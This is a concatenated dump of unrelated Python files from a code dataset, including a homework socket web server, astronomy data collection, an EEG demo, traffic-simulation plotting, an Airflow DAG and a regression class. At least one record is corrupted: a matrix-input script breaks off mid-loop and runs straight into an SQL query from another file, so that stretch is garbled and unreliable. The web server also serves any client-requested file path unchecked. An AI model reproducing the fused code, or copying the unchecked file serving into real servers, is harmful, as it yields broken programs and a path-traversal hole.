Found\"\n\n# Prepare a server socket (IPv4, TCP).\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\n# This eliminates wait time for address on restart.\n# (I did not notice any difference...)\nserverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\nserverPort = 8080\nserverSocket.bind((\"\", serverPort))\nserverSocket.listen(1)\n\nwhile True:\n print(\"Ready to serve...\")\n\n # Establish the connection.\n # This is the socket that will be used to return the HTML to the client.\n connectionSocket, addr = serverSocket.accept()\n message = connectionSocket.recv(1024).decode(\"utf-8\")\n\n # To get the method and filename:\n # Split the message string on spaces and return the first two elements.\n method, filename = message.split(\" \")[:2]\n\n header = None\n outputdata = None\n\n # Try to open requested file.\n # If file cannot be opened, serve 404.\n try:\n header = HTTP_VERSION + HEADER_SUCCESS + CONTENT_TYPE\n if filename[0] == \"/\": filename = filename[1:]\n file = open(filename)\n outputdata = file.read()\n except IOError:\n header = HTTP_VERSION + HEADER_FAILURE + CONTENT_TYPE\n filename = \"404.html\"\n file = open(filename)\n outputdata = file.read()\n\n # Sends success or failure depending on try/except block.\n connectionSocket.send(header.encode(\"utf-8\"))\n\n # Go through the outputdata and send it into connectionSocket.\n # Be sure to use .encode(\"utf-8\") to encode it into binary format.\n for token in outputdata:\n connectionSocket.send(token.encode(\"utf-8\"))\n\n connectionSocket.close()\n","sub_path":"hw-4/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"252028994","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2016 Yi Cao \n#\n# Distributed under terms of the GNU General Public License 3.0 license.\n\n\"\"\"\nThis program collects all data for the iPTF16abc paper into a single HDF5\nfile.\n\"\"\"\n\n\nimport numpy as np\nimport tables\nfrom astropy.io import ascii\nfrom astropy.time import Time\n\n\n# define photometry columns\nclass Photometry(tables.IsDescription):\n    time = tables.Float64Col()\n    flux = tables.Float32Col()\n    flux_err = tables.Float32Col()\n    mag = tables.Float32Col()\n    mag_err = tables.Float32Col()\n    telescope = tables.StringCol(16)\n    instrument = tables.StringCol(16)\n    filter_name = tables.StringCol(16)\n\n\nclass Spectroscopy(tables.IsDescription):\n    wavelength = tables.Float32Col()\n    flux_lambda = tables.Float32Col()\n\n\n# supernova data set\nclass SupernovaData(object):\n    def __init__(self, filename):\n        self._filename = filename\n        self._fp = tables.open_file(filename, mode=\"a\")\n\n        self._phot_table = self._fp.create_table(\n            self._fp.root, \"photometry\", Photometry, \"Photometric Data\")\n        self._phot_table.attrs.FIELD_0_UNIT = \"day\"\n        self._phot_table.attrs.FIELD_1_UNIT = \"Jy\"\n        self._phot_table.attrs.FIELD_2_UNIT = \"Jy\"\n        self._phot_table.attrs.FIELD_3_UNIT = \"AB mag\"\n        self._phot_table.attrs.FIELD_4_UNIT = \"AB mag\"\n\n        self._spec_group = self._fp.create_group(\n            self._fp.root, \"spectroscopy\", \"Spectroscopic Data\")\n\n    def add_photometry(self, time, filter_name, flux, flux_err,\n                       mag, mag_err, telescope, instrument):\n        row = self._phot_table.row\n        row[\"time\"] = time\n        row[\"filter_name\"] = filter_name\n        row[\"flux\"] = flux\n        row[\"flux_err\"] = flux_err\n        row[\"mag\"] = mag\n        row[\"mag_err\"] = mag_err\n        row[\"telescope\"] = telescope\n        row[\"instrument\"] = instrument\n        row.append()\n\n    def add_spec(self, time, telescope, instrument,\n                 wavelength, flux):\n        if len(wavelength) != len(flux):\n            raise InputError(\"len(wavelength) != \"\n                             \"len(flux)\")\n        table_name = \"%s_%i\" % (instrument.replace(\"-\", \"_\"), int(time))\n        tbl = self._fp.create_table(self._spec_group,\n                                    table_name,\n                                    Spectroscopy,\n                                    table_name)\n        tbl.attrs.FIELD_0_UNIT = \"Angstrom\"\n        tbl.attrs.FIELD_1_UNIT = \"Arbitrary Unit\"\n        tbl.attrs.OBS_DATE = time\n        tbl.attrs.TELESCOPE = telescope\n        tbl.attrs.INSTRUMENT = instrument\n        row = tbl.row\n        for w, f in zip(wavelength, flux):\n            row[\"wavelength\"] = w\n            row[\"flux_lambda\"] = f\n            row.append()\n\n\nclass InputError(Exception):\n\n    def __init__(self, msg):\n        self.msg = msg\n\n    def __str__(self):\n        return self.msg\n\n\ndef main():\n    file_object = SupernovaData(\"iPTF16abc.h5\")\n\n    # P48\n    data_dict = {\"g\": \"lc/forcepsffitdiff_d100151_f1_c11.out\",\n                 \"R\": \"lc/forcepsffitdiff_d3381_f2_c10.out\"}\n    for filter_name, filename in data_dict.iteritems():\n        data = ascii.read(filename, format=\"ipac\")\n        for item in data:\n            if item[\"MJD\"] < 57470:\n                continue\n            if item[\"flux\"] >= 5. 
* item[\"sigflux\"]:\n file_object.add_photometry(\n item[\"MJD\"],\n filter_name,\n item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631,\n abs(item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631) *\n ((item[\"sigflux\"] / item[\"flux\"])**2 +\n (item[\"zprms\"] / 2.5)**2)**0.5,\n -2.5 * np.log10(item[\"flux\"]) + item[\"zpmag\"],\n ((2.5 * item[\"sigflux\"] / item[\"flux\"])**2 +\n item[\"zprms\"]**2)**0.5,\n \"P48\",\n \"CFH12K\")\n else:\n file_object.add_photometry(\n item[\"MJD\"],\n filter_name,\n item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631,\n abs(item[\"flux\"] * 10**(-item[\"zpmag\"] / 2.5) * 3631) *\n ((item[\"sigflux\"] / item[\"flux\"])**2 +\n (item[\"zprms\"] / 2.5)**2)**0.5,\n -2.5 * np.log10(item[\"sigflux\"] * 5.) + item[\"zpmag\"],\n 99,\n \"P48\",\n \"CFH12K\")\n\n # P60\n with open(\"lc/Marshal_lc.txt\", \"r\") as fp_txt:\n for item in fp_txt:\n items = item.split(\",\")\n if len(items) < 3:\n continue\n if not items[7].startswith(\"\\\"P60\"):\n continue\n filter_name = items[2][1:-1]\n mag = float(items[4])\n mag_err = float(items[5])\n if mag > 90.:\n continue\n file_object.add_photometry(\n float(items[1]) - 2400000.5,\n filter_name,\n 10**(-mag/2.5) * 3631,\n 0.921 * mag_err * 10**(-mag/2.5) * 3631,\n mag,\n mag_err,\n \"P60\",\n \"SEDM\")\n\n # LCOGT\n with open(\"lc/iPTF16abc_lcophot.txt\", \"r\") as fp_txt:\n for item in fp_txt:\n items = item[:-1].split()\n MJD = float(items[1]) - 2400000.5\n mag = float(items[2])\n mag_err = float(items[3])\n filter_name = items[5]\n if filter_name == \"B\":\n flux = 10**(-mag / 2.5) * 4063 # Jy\n elif filter_name == \"V\":\n flux = 10**(-mag / 2.5) * 3636 # Jy\n else:\n flux = 10**(-mag / 2.5) * 3631\n flux_err = flux * 0.921 * mag_err\n file_object.add_photometry(\n MJD,\n filter_name,\n flux,\n flux_err,\n mag,\n mag_err,\n \"LCOGT-1m\",\n \"Sinistro\")\n\n # Swift Data\n with open(\"lc/swift_phot.txt\", \"r\") as fp_txt:\n for item in fp_txt:\n if item.startswith(\"#\"):\n continue\n items = item.split(\"\\t\")\n obs_time = Time(items[1], format=\"iso\", scale=\"utc\")\n if float(items[3]) < 5. 
* float(items[4]):\n continue\n file_object.add_photometry(\n obs_time.mjd,\n items[8].strip(),\n float(items[3]) * 1e-3,\n float(items[4]) * 1e-3,\n -2.5 * np.log10(float(items[3]) / 3.631e6),\n 1.0857 * float(items[4]) / float(items[3]),\n \"Swift\",\n \"UVOT\")\n\n # Spectra\n filename = \"spec/16abc_20160405_DCT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 7500)\n curve = curve[idx]\n file_object.add_spec(57483.26, \"DCT\", \"DeVeny\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160405_Gemini_N_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57483.88, \"Gemini-North\", \"GMOS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160406_Keck2_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 5500,\n curve[\"wavelength\"] < 8100)\n curve = curve[idx]\n file_object.add_spec(57484.51, \"Keck-II\", \"DEIMOS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160408_Keck2_v2.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 5500,\n curve[\"wavelength\"] < 8100)\n curve = curve[idx]\n file_object.add_spec(57486.51, \"Keck-II\", \"DEIMOS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160410_Keck1_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57488.38, \"Keck-I\", \"LRIS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160411_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57489.506,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160412_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57490.396,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160413_FTS_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57491.551,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160414_VLT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 30000)\n curve = curve[idx]\n file_object.add_spec(57492.20,\n \"VLT\", \"X-shooter\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160416_VLT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57494.00,\n \"VLT\", \"UVES\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160425_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57503.319,\n \"LCOGT-2m\", \"FLOYDS\",\n 
curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160428_NOT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3600,\n curve[\"wavelength\"] < 8100)\n curve = curve[idx]\n file_object.add_spec(Time(\"2016-04-28\", format=\"iso\").mjd,\n \"NOT\", \"ALFOSC\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160430_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 10000)\n curve = curve[idx]\n file_object.add_spec(57508.272,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160510_Keck1_v2.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57518.42, \"Keck-I\", \"LRIS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160512_VLT_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 3300,\n curve[\"wavelength\"] < 30000)\n curve = curve[idx]\n file_object.add_spec(57520.03,\n \"VLT\", \"X-shooter\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160521_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 4000,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57529.405,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160603_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 4000,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57542.408,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160611_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n idx = np.logical_and(curve[\"wavelength\"] > 4000,\n curve[\"wavelength\"] < 9000)\n curve = curve[idx]\n file_object.add_spec(57550.402,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n filename = \"spec/16abc_20160623_FTN_v1.ascii\"\n curve = np.genfromtxt(filename,\n names=[\"wavelength\", \"flux\"])\n file_object.add_spec(57562.379,\n \"LCOGT-2m\", \"FLOYDS\",\n curve[\"wavelength\"], curve[\"flux\"])\n\n return\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"data/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":13961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52943790","text":"def fib(n):\n#initial assignment based on where the series need to start\n a = 2\n b = 1\n# If the required index is 0th position print the first lucas number\n if n == 0:\n print (a)\n else:\n# Loop to move the latest number to prior and new number to the next calculated variable\n for i in range(n):\n next = a + b\n a = b\n b = next\n print (a)\n","sub_path":"students/vvinodh/Lesson2/series_lucas.py","file_name":"series_lucas.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"533494256","text":"import argparse\nimport time\nimport brainflow\nimport numpy as np\n\nimport pandas as pd\nimport matplotlib\nmatplotlib.use ('Agg')\nimport matplotlib.pyplot as 
plt\n\nfrom brainflow.board_shim import BoardShim, BrainFlowInputParams, LogLevels\nfrom brainflow.data_filter import DataFilter, FilterTypes, AggOperations\n\n\ndef main ():\n parser = argparse.ArgumentParser ()\n # use docs to check which parameters are required for specific board, e.g. for Cyton - set serial port,\n parser.add_argument ('--ip-port', type = int, help = 'ip port', required = False, default = 0)\n parser.add_argument ('--ip-protocol', type = int, help = 'ip protocol, check IpProtocolType enum', required = False, default = 0)\n parser.add_argument ('--ip-address', type = str, help = 'ip address', required = False, default = '')\n parser.add_argument ('--serial-port', type = str, help = 'serial port', required = False, default = '')\n parser.add_argument ('--mac-address', type = str, help = 'mac address', required = False, default = '')\n parser.add_argument ('--other-info', type = str, help = 'other info', required = False, default = '')\n parser.add_argument ('--board-id', type = int, help = 'board id, check docs to get a list of supported boards', required = True)\n parser.add_argument ('--log', action = 'store_true')\n args = parser.parse_args ()\n\n params = BrainFlowInputParams ()\n params.ip_port = args.ip_port\n params.serial_port = args.serial_port\n params.mac_address = args.mac_address\n params.other_info = args.other_info\n params.ip_address = args.ip_address\n params.ip_protocol = args.ip_protocol\n\n if (args.log):\n BoardShim.enable_dev_board_logger ()\n else:\n BoardShim.disable_board_logger ()\n\n # demo how to read data as 2d numpy array\n board = BoardShim (args.board_id, params)\n board.prepare_session ()\n board.start_stream ()\n BoardShim.log_message (LogLevels.LEVEL_INFO.value, 'start sleeping in the main thread')\n time.sleep (10)\n # data = board.get_current_board_data (256) # get latest 256 packages or less, doesnt remove them from internal buffer\n data = board.get_board_data () # get all data and remove it from internal buffer\n board.stop_stream ()\n board.release_session ()\n\n # demo how to convert it to pandas DF and plot data\n eeg_channels = BoardShim.get_eeg_channels (args.board_id)\n df = pd.DataFrame (np.transpose (data))\n print ('Data From the Board')\n print (df.head (10))\n plt.figure ()\n df[eeg_channels].plot (subplots = True)\n plt.savefig ('before_processing.png')\n\n # demo for data serialization\n DataFilter.write_file (data, 'test.csv', 'w')\n restored_data = DataFilter.read_file ('test.csv')\n restored_df = pd.DataFrame (np.transpose (restored_data))\n print ('Data From the File')\n print (restored_df.head (10))\n\n # demo how to perform signal processing\n for count, channel in enumerate (eeg_channels):\n if count == 0:\n DataFilter.perform_bandpass (data[channel], BoardShim.get_sampling_rate (args.board_id), 15.0, 6.0, 4, FilterTypes.BESSEL.value, 0)\n elif count == 1:\n DataFilter.perform_bandstop (data[channel], BoardShim.get_sampling_rate (args.board_id), 5.0, 1.0, 3, FilterTypes.BUTTERWORTH.value, 0)\n elif count == 2:\n DataFilter.perform_lowpass (data[channel], BoardShim.get_sampling_rate (args.board_id), 9.0, 5, FilterTypes.CHEBYSHEV_TYPE_1.value, 1)\n elif count == 3:\n DataFilter.perform_highpass (data[channel], BoardShim.get_sampling_rate (args.board_id), 3.0, 4, FilterTypes.BUTTERWORTH.value, 0)\n elif count == 4:\n DataFilter.perform_rolling_filter (data[channel], 3, AggOperations.MEAN.value)\n elif count == 5:\n DataFilter.perform_rolling_filter (data[channel], 3, AggOperations.MEDIAN.value)\n\n df = 
pd.DataFrame (np.transpose (data))\n print ('Data After Processing')\n print (df.head (10))\n plt.figure ()\n df[eeg_channels].plot (subplots = True)\n plt.savefig ('after_processing.png')\n\n\nif __name__ == \"__main__\":\n main ()\n","sub_path":"python-package/examples/brainflow_get_data.py","file_name":"brainflow_get_data.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163203001","text":"\ndef main():\n r=int(input())\n c=int(input())\n m=r*c\n Lista1=[]\n Lista2=[]\n index=0\n if r==c:\n for i in range (m):\n n=int(input())\n Lista1.append(n)\n while index 0 AND entranceTime < {} AND origin = {} AND destination = {}'.format(maxT, oriId, desId))\n vehTTime = cur.fetchall()\n con.close()\n # Key: essentially the timestep (tStep below), this is because we are #\n # targeting a specific O/D pair. #\n tStepAccumTime = {}\n tStepAccumCount= {}\n tStepMinTime = {}\n for i in xrange(len(vehTTime)):\n thisTStep = math.ceil(vehTTime[i][1]/60)\n if thisTStep in tStepAccumTime:\n tStepAccumTime[thisTStep] += vehTTime[i][2]\n tStepAccumCount[thisTStep]+= 1\n if vehTTime[i][2] < tStepMinTime[thisTStep]:\n tStepMinTime[thisTStep] = vehTTime[i][2]\n else:\n tStepAccumTime[thisTStep] = vehTTime[i][2]\n tStepAccumCount[thisTStep] = 1\n tStepMinTime[thisTStep] = vehTTime[i][2]\n tStep = []\n absNash = []\n rltNash = []\n for key in tStepAccumTime.keys():\n tStep.append(key)\n absNash.append(tStepAccumTime[key]/tStepAccumCount[key] - tStepMinTime[key])\n rltNash.append(tStepAccumTime[key]/(tStepAccumCount[key] * tStepMinTime[key]) - 1)\n zipped = zip(tStep, absNash, rltNash)\n zipped.sort()\n unzip = zip(*zipped)\n sTStep, sAbsNash, sRltNash = map(list, unzip)\n return sTStep, sAbsNash, sRltNash\n\ndef sortBasedOnPercentage(percentage, absNash, rltNash):\n #----------------------------------------------------------#\n # Helper function to sort all data based on the percentage #\n # of App users #\n #----------------------------------------------------------#\n zipped = zip(percentage, absNash, rltNash)\n zipped.sort()\n unzip = zip(*zipped)\n sPercentage, sAbsNash, sRltNash = map(list, unzip)\n return sPercentage, sAbsNash, sRltNash\n\ndef traverseMultiDB(fileList, debug, maxT):\n #----------------------------------------------------------#\n # Traverses multiple DB and return the average travel time #\n # (i.e. 
TTime) of app users and non-app users #\n    #----------------------------------------------------------#\n    percentage = []\n    absNash = []\n    rltNash = []\n    tStep = []\n    oriId, desId = getODPair(fileList[0])\n    for filename in fileList:\n        thisPercentage = getPercentage(filename)\n        thisTStep, thisAbsNash, thisRltNash = extractSingleDB(filename, thisPercentage, debug, oriId, desId, maxT)\n        percentage.append(thisPercentage)\n        absNash.append(thisAbsNash)\n        rltNash.append(thisRltNash)\n        tStep = thisTStep\n    percentage, absNash, rltNash = sortBasedOnPercentage(percentage, absNash, rltNash)\n    return percentage, tStep, absNash, rltNash\n\ndef getColorChoices():\n    #-----------------------------------------------------------#\n    # Helper function for returning eight basic color choices  #\n    # for matplotlib ('b', 'g', 'r', 'c', 'm', 'y', 'k', 'w')  #\n    # together with an initial index of 0                      #\n    #-----------------------------------------------------------#\n    ret = []\n    ret.append('b') \n    ret.append('g') \n    ret.append('r') \n    ret.append('c') \n    ret.append('m') \n    ret.append('y') \n    ret.append('k') \n    ret.append('w')\n    return ret, 0\n\ndef generatePlot(percentage, timeStep, absNash, rltNash):\n    #-----------------------------------------------------------#\n    # Helper function for generating a plot that compares the #\n    # travel time of App users and non-App users with respect to#\n    # the percentage of App users in the network #\n    #-----------------------------------------------------------#\n    '''\n    font = {'family':'normal',\n            'weight':'bold',\n            'size':6}\n    plt.rc('font', **font)\n    # Plot multiple figures #\n    plt.figure(1, figsize = (24, 14), dpi = 100)\n    for i in xrange(len(percentage)):\n        thisAx = plt.subplot(5, 4, i + 1)\n        thisAx.set_xlabel('Time Step (#)')\n        thisAx.set_ylabel('Absolute Nash Distance (sec)')\n        thisAx.plot(timeStep, absNash[i], color = (0,0,1), label = 'Abs Nash Distance', dashes = [10, 5], linewidth = 2.0)\n        thisAx.set_ylim(0, max(absNash[i])*1.1)\n        # THIS LINE IS ONLY FOR PLOTTING A SINGLE LINE THAT REPRESENTS THE #\n        # START OF THE ACCIDENT, THIS IS NOT FOR ANY GENERALIZED PLOTTING! 
#\n        #thisAx.plot([30, 30], [0, max(absNash[i])*1.1], color = (0,0,0), dashes = [2, 2], linewidth = 2.0)\n        #thisAx.plot([60, 60], [0, max(absNash[i])*1.1], color = (0,0,0), dashes = [2, 2], linewidth = 2.0)\n        #------------------------------------------------------------------#\n        thisAx2 = thisAx.twinx()\n        thisAx2.set_ylabel('Relative Nash Distance (%)')\n        thisAx2.plot(timeStep, rltNash[i], color = (1,0,0), label = 'Rlt Nash Distance', dashes = [10, 5], linewidth = 2.0)\n        thisAx.set_title('Nash Distance for app user percentage {}%'.format(percentage[i]))\n        hand1, lab1 = thisAx.get_legend_handles_labels()\n        hand2, lab2 = thisAx2.get_legend_handles_labels()\n        firstLegend = plt.legend(handles = hand1, loc = 1)\n        dummy = plt.gca().add_artist(firstLegend)\n        plt.legend(handles = hand2, loc = 2)\n    plt.savefig('outputFigures/single_timestep_ND.png')\n    '''\n    # For plotting the timestep - abs Nash Distance graph #\n    font = {'family':'normal',\n            'weight':'bold',\n            'size':20}\n    plt.rc('font', **font)\n    fig, ax = plt.subplots(figsize = (24, 14), dpi = 100)\n    for i in xrange(len(percentage)):\n        ax.plot(timeStep, absNash[i], color = (1 - float(percentage[i])/100, 0, float(percentage[i])/100), \\\n                label = 'Abs Nash Distance of percentage {}'.format(percentage[i]), \\\n                linewidth = 4.0)\n    hand, lab = ax.get_legend_handles_labels()\n    plt.legend(handles = hand, loc = 1)\n    ax.set_ylim(0, max(max(absNash)) * 2)\n    ax.set_xlabel('Time Step (#)')\n    ax.set_ylabel('Absolute Nash Distance (sec)')\n    ax.set_title('Absolute Nash Distance for Different App User Percentages')\n    if plotEvent:\n        ax.plot([eventStart, eventStart], [0, max(max(absNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n        ax.plot([eventEnd, eventEnd], [0, max(max(absNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n    plt.savefig('outputFigures/absND.png', dpi = 'figure')\n\n    # For plotting the timestep - rlt Nash Distance graph #\n    font = {'family':'normal',\n            'weight':'bold',\n            'size':20}\n    plt.rc('font', **font)\n    fig, ax = plt.subplots(figsize = (24, 14), dpi = 100)\n    for i in xrange(len(percentage)):\n        ax.plot(timeStep, rltNash[i], color = (0, 1 - float(percentage[i])/100, float(percentage[i])/100), \\\n                label = 'Rlt Nash Distance of percentage {}'.format(percentage[i]), \\\n                linewidth = 4.0)\n    hand, lab = ax.get_legend_handles_labels()\n    plt.legend(handles = hand, loc = 1)\n    ax.set_ylim(0, max(max(rltNash)) * 2)\n    ax.set_xlabel('Time Step (#)')\n    ax.set_ylabel('Relative Nash Distance (%)')\n    ax.set_title('Relative Nash Distance for Different App User Percentages')\n    if plotEvent:\n        ax.plot([eventStart, eventStart], [0, max(max(rltNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n        ax.plot([eventEnd, eventEnd], [0, max(max(rltNash)) * 2], color = (0, 0, 0), dashes = [2, 2], linewidth = 4.0)\n    plt.savefig('outputFigures/rltND.png', dpi = 'figure')\n    \n    print('plotting complete, results saved under ./outputFigures/\\n')\n\ndef printUsage(): \n    print('usage: \\n python extractMultiSQLite.py directoryName showAllMessages maxEntranceTime')\n    print('directoryName: the directory in which the sqlite databases are stored')\n    print('showAllMessages: use \"true\" to output all messages, recommended')\n    print('maxEntranceTime: the maximum time cars are allowed to enter the network')\n    print('system exiting...')\n    sys.exit()\n\ndef std4Call(dirName, maxTime):\n    print('---------------------------------------')\n    print(' executing std4 plots ')\n    print('---------------------------------------')\n    fileList = 
getAllFilenames(dirName)\n percentage, timeStep, absNash, rltNash = traverseMultiDB(fileList, True, maxTime)\n generatePlot(percentage, timeStep, absNash, rltNash)\n\n# Main code starts here\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n printUsage()\n dirName = sys.argv[1]\n debug = sys.argv[2]\n maxEntranceTime = float(sys.argv[3])\n fileList = getAllFilenames(dirName)\n dm.printObjFiles(fileList, debug)\n percentage, timeStep, absNash, rltNash = traverseMultiDB(fileList, debug, maxEntranceTime)\n generatePlot(percentage, timeStep, absNash, rltNash)\n","sub_path":"std4_elapsedTime_ND.py","file_name":"std4_elapsedTime_ND.py","file_ext":"py","file_size_in_byte":10656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539660367","text":"from airflow.models import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nimport os\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner':'babaj',\n 'retries': 1,\n 'email_on_retry':'no_mail@nohost.org',\n 'email_on_failure':'no_mail@nohost.org',\n 'depends_on_past':False,\n 'start_date':datetime(2009,12,1)}\n\ndag = DAG('daily_dag', default_args=default_args, catchup=True, schedule_interval='@daily')\n\ndef func_1(path, filename):\n f = open(os.path.join(path, filename), 'a')\n f.write(f'Time: {datetime.now().hour}:{datetime.now().minute:02}:{datetime.now().second:02}\\n')\n f.close()\n\nfunc_2 = lambda: print(2 + 2)\n\nrun_first = PythonOperator(\n task_id='first_daily_task',\n python_callable=func_1,\n op_kwargs={'path':'/home/yurii/Desktop/new', 'filename':'daily.txt'},\n dag=dag)\n\nrun_second = PythonOperator(task_id='second_daily_task',\n python_callable=func_2,\n dag=dag)\n\nrun_first >> run_second\n","sub_path":"dags_archive/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"149309372","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass Data(object):\n x=[]\n y=[]\n x_square=[]\n y_square=[]\n xy_multiply=[]\n m=0\n c=0\n \n\n def __init__(self,var1,var2):\n self.x=var1\n self.y=var2\n self.m=0\n self.c=0\n \n \n\n def CalcData(self):\n for itemX,ItemY in zip(self.x,self.y):\n self.x_square.append(itemX**2)\n self.y_square.append(ItemY**2)\n self.xy_multiply.append(itemX*ItemY)\n\n def CalcM(self):\n self.m=((len(self.x)*sum(self.xy_multiply))-(sum(self.x)*sum(self.y)))/((len(self.x)*sum(self.x_square)-sum(self.x)**2))\n \n def CalcC(self):\n self.c=((sum(self.y)*sum(self.x_square))-(sum(self.x)*sum(self.xy_multiply)))/((len(self.x)*sum(self.x_square))-sum(self.x)**2)\n \n def CalcPlot(self):\n x_plot=[]\n y_plot=[]\n\n for step in range(0,10):\n x_plot.append(step)\n y_plot.append(self.m*step+self.c)\n\n return x_plot,y_plot\n\n def CalcRMSE(self):\n RMSE=0\n for item1,item2 in zip(self.x,self.y):\n RMSE=RMSE+(item2-(self.m*item1+self.c))**2\n\n return RMSE\n\n def PrintData(self): \n for item1,item2,item3 in zip(self.x_square,self.y_square,self.xy_multiply):\n print(\"X^2: \",item1,\" Y^2: \",item2,\" X*Y\", item3)\n\n print(\"M: \",self.m)\n print(\"C: \",self.c)\n print(\"RMSE: \",round(self.CalcRMSE(),2))\n \n\ndef Foo():\n \n np.random.seed(5)\n\n #Testing set\n # x = np.arange(1, 101)\n # y = 3 * x + np.random.normal(0, 60, 100)\n \n x=[1,2,3,4,5]\n 